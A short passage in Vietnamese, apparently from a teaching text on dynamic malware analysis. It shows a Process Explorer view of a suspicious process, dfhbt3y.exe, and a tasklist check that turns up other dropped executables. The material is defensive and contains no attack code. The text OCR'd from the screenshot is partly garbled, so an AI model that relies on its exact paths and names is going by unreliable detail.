Người phân tích lại tiếp tục quan sát ProcessExplorer thì thay có 
chương trình lạ chạy là dfhbt3y.exe 


œ. dfhbt3y.exe:1852 Properties 


Threads TCP/IP Security Environment Strings 
Image Performance Disk and Network Performance Graph 


Image File 


ai (Not verified) 


Version: 1.1.0.1 
Time: 10/6/2011 6:19 AM 


Path {Image is probably packed): 


Command line: 

| "C:\Documents and SettingsyAdministratorlApplication Data\dFhbt3y.e: | 
Current directory: 

_C:\WINDOWS\system32\ 


Parent: VRTDC.tmp(436) 
Liser: NT ALITHORITYTASYSTEM 
Started: 6:19:26 AM 10/6/2011 


Comment: | 


Data Execution Prevention (DEP} 


Người phân tích bat cửa số cmd lên sử dụng lệnh "tasklist/svc " thì 
thấy ngoài chương trình trên ra còn có “mbkfvo8.exe”. Khi theo đường 
dẫn dé tìm đến “dfhbt3y.exe” thì thấy có file "aeuqifjyx4.exe" ở thư 
mục Administrator. Từ đây có thể thấy rằng ba file trên được sinh ra từ 
10M-109.EXE. Để thấy rõ hơn thì cần phải phân tích thêm về 
Wireshark và tiến trình svchost.exe. Có thể sử dụng kết hợp nhiều 
phương pháp như phân tích tinh dé tiếp tục công việc. Trên đây là một vi 
dụ cụ thê về phân tich mã độc sử dụng phương pháp phân tích động. 
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